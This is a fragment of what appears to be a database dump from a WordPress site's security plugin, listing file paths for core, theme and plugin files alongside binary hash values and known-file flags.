H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('ĕ�B����ls��e�','wp-includes/wp-includes/SimplePie/Enclosure.php',0,'��(2ROf;Vkj�','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('ĥXEé3;W���t','wp-content/themes/auberge/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O.y���G���+Vu�Y','h�5t����Icw2;sI���9�и|T��','',0,'?'),('Ħ��SNL��h`���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"mb�\'u�̩��D�','9Z�Jn�l+;�CG; �+�0s����f�8�','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��1T�(Nȩ\Z','�7��NZ|�0�N��HQ��r�\nR��o�C�f','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('���ؑ\\���n`�͜','wp-content/themes/sg-window/inc/widget-project-naigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c(��}���$l����','͙c @9Z`�v�7�v��\\ز���4��','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('���M\\��<(��s�','wp-content/themes/advance/inc/kirki/assets/js/l10n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8%�T���{ )eO\r>�','����3�R�{��s�w��\r+Y~\0e�Ó=թ$','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�\ZN��J��%7I','wp-content/themes/hueman/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�� �-�N>��O}C','�&;ɟEYL�@˪�\',����ia�=h�u','',0,'?'),('�uy(e_�X�\0�6','wp-includes/wp-includes/js/media-views.min.js',0,'�J虝���\n�G{5�','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('�\"p���d��[�:�','wp-content/themes/kidzoo-lite/template-parts/content-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j狢��|����(','���VO�X��$���7���ۈϪ�߬L�D','',0,'?'),('�5�7{�-C�Zט;ׂ','wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&>\\�<��W��c��8�','�%\Z�\"S��/k��������������Q�','',0,'?'),('�7�/y�)x/=P�','wp-content/themes/maxbusiness/js/swiper.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bBg��fY��N�=���','>����U!��GL��Y�l�^|XG`B�m�����','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\ |\\�?g�\n','',0,'?'),('�F��ъ�a�mc�N�','wp-content/themes/event/inc/css/event-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����C�۪DI/���','��䯟��������8汲�P�|�yS�\"�f�','',0,'?'),('�OYD�;�/\n�~��','wp-includes/wp-includes/Requests/Exception/HTTP/406.php',0,'K��l�h�r��9�\"\0�','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�V݀^�W�4��-zX','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fq�ag�D���i\"','-u��|�5��CD`��磩QrG��)&�','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q ����c=','�T�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�bKq�����6$��\r','wp-content/themes/promote/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�{^����_�|��','��p�q�?���e�<���籂[�����=','',0,'?'),('�~s�5խ�?([�Ҹ�','wp-includes/wp-includes/class.wp-scripts.php',0,'��s�zrU[\nK��z��','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3B2�&*)��^*��3','�ĤѮp\\��;x�\'���H�42�N��_�Ei','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �W� r��>�Vݟ�','p�<L�>�������\r�~29~�^��ɋF�','',0,'?'),('ŕ�y�n�\\��zL�ʨ','wp-includes/wp-includes/class-wp-http-curl.php',0,'�S�`3F�O�,;N#���','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y�� �]�2','',0,'?'),('ţ�-��s�89�%�)','wp-content/themes/kidzoo-lite/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�PS�\'��Z5�Z}��','���qa#T0��T�n=���8X\n�Bg%L�','',0,'?'),('że�����E@}-�','wp-content/plugins/wp-cerber/assets/flags/ss.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('���9�+e?�����','wp-content/themes/hueman/assets/admin/js/post-formats.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�yƦ���y�b�','�\r�_W>;O�l��=��]�����0Ҥ\0�7��','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9 +V�k�','',0,'?'),('�v�0�r�m����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�U�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e� �','',0,'?'),('��A#����Uu�O���','wp-content/plugins/wp-cerber/assets/flags/sk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�q!-�\"�jU]P','��!$�2�E@��e�K���z\\�x�<GF� ','',0,'?'),('�v�T!)��aH�','wp-content/plugins/wp-cerber/assets/flags/mq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zs�׳Wh���','����J���U2V\\��h�Ѧ�Z�t/���Q','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������9��Qv��','��PgcZn1q��b�-���x�]ME��ܻ���','',0,'?'),('�#6��n!����S','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js',0,'�>d�KP\'IC��3��8','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J� ���ST�_','',0,'?'),('����c�$Jm-�8�','wp-includes/wp-includes/js/dist/keyboard-shortcuts.js',0,'w�\ZH����%3kGUE','w�\ZH����%3kGUE','\"�����8�� �鎸\'��o83�J���w���','',0,'?'),('�X2�oDz���f\0Z<z','wp-content/themes/hueman/assets/front/img/demo/logo/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��w�y�k%8��g_','��2d�l�0f�:_���K��`;꿼Q�','',0,'?'),('�Rx�M�J�=����','wp-includes/wp-includes/css/dist/editor/style-rtl.min.css',0,'_O7b/��T���m�','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('� ��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1 �?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�>u�i&^?N͵�','wp-content/themes/spidermag/assets/images/preloader/list.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v]�Um�Y��~����','��$87b�͙*�Of�U¡J�\06�R�dK��','',0,'?'),('�-�#lwT������|','wp-content/themes/storeone/template-parts/home-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���tZ&Y�f�a�','�-�Adsn�B����?g��-�����','',0,'?'),('�(�|��6{�oH\\i��K','wp-content/themes/Yegor/FT/plugin/options-framework/includes/class-options-interface.php',0,'������f�˰[��#','������f�˰[��#','W�����AH�zB��01L�GN�x�X0Q`','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�Ԁ�v��Ș~����','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s �Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('�]�.^݁\0P_�F�i�\n','wp-content/themes/spidermag/spidermag/hooks/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���R��C���d*','�Y-)��h��f��kq�C���4��o�A����','',0,'?'),('�`e�Qo�U%���K','wp-content/themes/advance/tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�!ȑb��K�j�','�Ƨ���gv�U_����\0���$����F�#�!','',0,'?'),('�tM�դ��QMc���?','wp-content/themes/promote/woocommerce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0G�\Z}�U\"��','���i T\Z>4�%��C��H��v�X�8�<�','',0,'?'),('�v��T�Lv�\"��A�I�','wp-content/themes/promote/inc/kirki/assets/css/customizer-dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��9�#=D�-��','p�� aк^�\\F}�dL0�m�dҌ��v^;m�','',0,'?'),('ƅ����|_�i/y�� ','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('ƈO�����Y��g��Y','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-radio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;1�4�7� >!s\0.','�{p��۹�\0�YںC8h3$�~z�d����','',0,'?'),('Ɣ�}r��ףC9�L� \n','wp-content/themes/sg-window/inc/js/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_ ��w��U� D�','�r�Jr��u~�D�WK��^�@\'��5s�%','',0,'?'),('Ɲ��߇���,����','wp-content/themes/storeone/css/simplelightbox.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڮ���\"���','�wk��U-�:��z�[��:�-L�\r�','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hh�miJ=�9�?Y�\n','���\\��ç�W2���~:�y{�=�$fh��','',0,'?'),('�Ցf�)cW)֗�Og�','wp-content/themes/twentytwentyone/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��5�%�$���','}�C!�Mk;\'�?]�]��VW��A�e�Bߊ�','',0,'?'),('���yw�-p��`�)','wp-content/plugins/wp-cerber/assets/flags/cd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��E�\0{+k�`֚o','bf&<�9�\nTĔ��n��\Z~�\Z,����!��','',0,'?'),('��lM\"k.�JPs�b&�','wp-content/themes/maxbusiness/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�\"�+l�9K7\r9�','2�c�^�a�j���J����� h��3��p�','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�0�\"����#�','��֩y\n� ��ij����X�H�-<f ��c�','',0,'?'),('�A�2�fn��9�V��','wp-content/themes/vision-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�)��k5��n}�4�','\Zr�nR�;��E�[��)�J�p�U-�q���\0?q','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՕU��]��\'�r\r�\'�','��V�z�x�K�fB_�KW��Vt�\0[�)m���','',0,'?'),('����͊pzn0&t�C','wp-includes/wp-includes/js/jquery/ui/dialog.js',0,'�屬�U��u���z̜','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('�k8Q?<��y�p�','wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�CN3|)-�2Na���','���t�Cz� ����n�`j\r�M��N\"Ag���','',0,'?'),('�#��A�9��`�ـS','wp-content/themes/newsmag/assets/vendors/blazy/blazy.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���NNmc��GWRj9�',',r��2\rN�$���V��\"�f�{����?�ġ�','',0,'?'),('�=�m����^D6W�','wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vY��P\\;���4�','�s���3s=���#q���˞< �I\'r&�','',0,'?'),('�?7W��H��E��|�','wp-content/themes/promote/inc/kirki/assets/scss/controls/spacing.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l%ŕg%y�QK���','U�?swug����E�ը���cƧ�GNJ~���B','',0,'?'),('�FU�G��Хd�c��NC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Al͟��\ZԀ�c��','�x�����(��Sn��\n;�y{%�_�j���/','',0,'?'),('�JD�;/����','wp-content/themes/newsmag/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-=z��H���p ','�q����?�N�#�ߘ��\r���#\n�߰��','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('Lj�Q&*o(��a#IX','wp-includes/wp-includes/Requests/Exception/HTTP/409.php',0,'�Z�i�~*=����','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('ǑCvd��ė�','wp-includes/wp-includes/ID3/readme.txt',0,'ݣ��z�eѧѥk58�','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('ǟ��H0�Q�Y�>','wp-includes/wp-includes/class-walker-nav-menu.php',0,'�S��|8���~Rx�4','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǩ�XdrY[�w�ĺ�','wp-content/themes/advance/inc/kirki/includes/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p ���v+���Fx�','ǣ�����b �n/�C�X���<�lF�S�','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PI ��k����� ','&�v��x¡�gu�SV���ҏ����r�','',0,'?'),('Ǭ�9p���RJ���','wp-content/themes/advance/inc/kirki/assets/scss/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5l�b>�3��9ZJ�','�Ȝ�7�Kc`�ɧ�k�����F9�L���','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�`�p.�Zb �x3I','#O)r�a�%�����r�2tK�P��1��kw��','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('Ǽ\'�K�^�]�^�5�-)','wp-content/themes/event/inc/customizer/functions/design-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d��|}=:�G��','�)��D�fm�-I��\"��J���\r�Ӫ��p|�ؘ','',0,'?'),('Ǽ=���/%�@6�Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��\\�sӳR��]iO','̰簃b���p4�i��шB6����A���','',0,'?'),('��7L>ݸ���c���','wp-content/themes/Endolf/FT/inc/lessc.php',0,'���y\\������wб=','���y\\������wб=','�*�-wc�N��8qEiIy1\Zs���N�d�@�','',0,'?'),('��G�4!7�#u%','wp-content/themes/promote/inc/kirki/includes/output/property/class-kirki-output-property.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_[M\"]���00�ö�P','U���jA ��\n�a�cD��_�Q\"-��.� �','',0,'?'),('�ڪ�&����e��pR��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php',0,'x} ��pc��K�O�','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}��=kq�δ','wp-content/themes/sg-window/img/icons/yahoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g+�d e���v','���&+B��V�9\'�!�hh���g�9','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('��w.�(S�*I�e','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB���j����',')���i�o�[G\ZC�)E�ϳl�\r�h�d�!','',0,'?'),('��ؓT��ZÔ�','wp-content/themes/promote/inc/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M/��nKĎ�tȤoi','�| ����b���\"6��;�[+�Է!��','',0,'?'),('�/�D�17X;>��','wp-content/themes/skt-pathway/full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�Q(�v�\'R9��','����\nFX���d�\0��CR�:�Ν> vX','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽ �%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�$�6�����\"','�tɢ�����C-?�\'(�uꢦA�T-1ba��:','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�o/f���','+��o�Ӭ8|�(9-�5����Xe�`H','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��vwX\n_Yg!��','r;�\Z� G�����[i$�)���v�]j7�im#','',0,'?'),('�H ���\n>��a�~','wp-includes/wp-includes/blocks/latest-posts/block.json',0,'�5P�m��)-\\\r�M�','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('�Qe`Wa\'�`�}','wp-content/themes/kidzoo-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�Ȏ�ꃎF�ʀ4','��8ԕ��KMH��8��+�J�W��C��+','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�_����R3��F=','wp-content/themes/promote/page-full_width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����@�V�p���se','Ίn�a�;���.n�LS�@��Qx��E�GO','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�we�J�����@�?��','�W�ľ�6���7#`_�g�;���,9�.��=','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��ӹu�;P�','�aD�,�ǭ��+v�Fe\"+���!���1t','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('ȑ\\�#\"�*����*!2','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',0,'����O�����81','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('ȓt=wkCR��n�ao','wp-content/themes/promote/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+&L�#���|��','�7�b6���H}w7��x�/yl�ڹ��=�','',0,'?'),('șgH��^��Р�\Z��','wp-content/themes/Yegor/FT/plugin/options-framework/js/media-uploader.js',0,'�A���@�k@VgdH','�A���@�k@VgdH','�l��k��&��Snt��m���b�̧:S���-1','',0,'?'),('Ȣ�@Ø�`U�ѣ /�','wp-content/themes/sg-window/img/icons/flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��?߽�I5X\0��','�^ m�~�=`!��pb��Nd�Lox�s�Otx�','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a��GX9PP','',0,'?'),('ȩ��u��s�\\r�e�','wp-includes/wp-includes/Text/Diff/Renderer.php',0,'�� �C0�Y7O�@�GS','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('Ȳ>�>��h�SM','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bm�L�?M_B���2','�$h�A�Dgb���F�B�p����oc�ƚTƄ\n','',0,'?'),('ȶ{8�k0��-�P)$h','wp-content/themes/wp-barrister/library/js/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c<r���d#�ON�{','m\n�X\"�n=��Ne�;SD{(�ƨi�����','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('��ދ2CZ��b�\0g%�','wp-content/themes/promote/inc/kirki/assets/images/3cm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z��6�\"��','/��F��Z�\n�W�i<\no��>D��]�����','',0,'?'),('�ʵ�*\'��]���=��','wp-includes/wp-includes/Requests/Cookie.php',0,'�]��4�G��FdW(�','�]��4�G��FdW(�','1��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('���ܻ���\r4�K�{J','wp-content/themes/advance/inc/kirki/includes/class-kirki-toolkit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=+T\Z�5ecؐH��','�Oo�P6�:|5/M�_�6#.y�Ύ�y(���','',0,'?'),('���=K������Q','wp-content/themes/newsmag/assets/js/functions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�\\��)�>�t?','`��!�O{,�L���ᱱ��N�ڨ��D��','',0,'?'),('�i���#G�\'�͏','wp-content/themes/promote/inc/kirki/assets/js/controls/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('���}�U��y���','wp-content/themes/capacious/assets/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\\p��8ni�aTڌ\\�','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('��B�{��l^|R','wp-content/themes/skt-pathway/images/slides/slide1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���驴�n��/���','�i0�Ka�1�3Ƭ����6�1����E~Gr�^','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�tg��q�O1�0�','�Džg�L���)�Q�r���ty�jX��O�\n�& 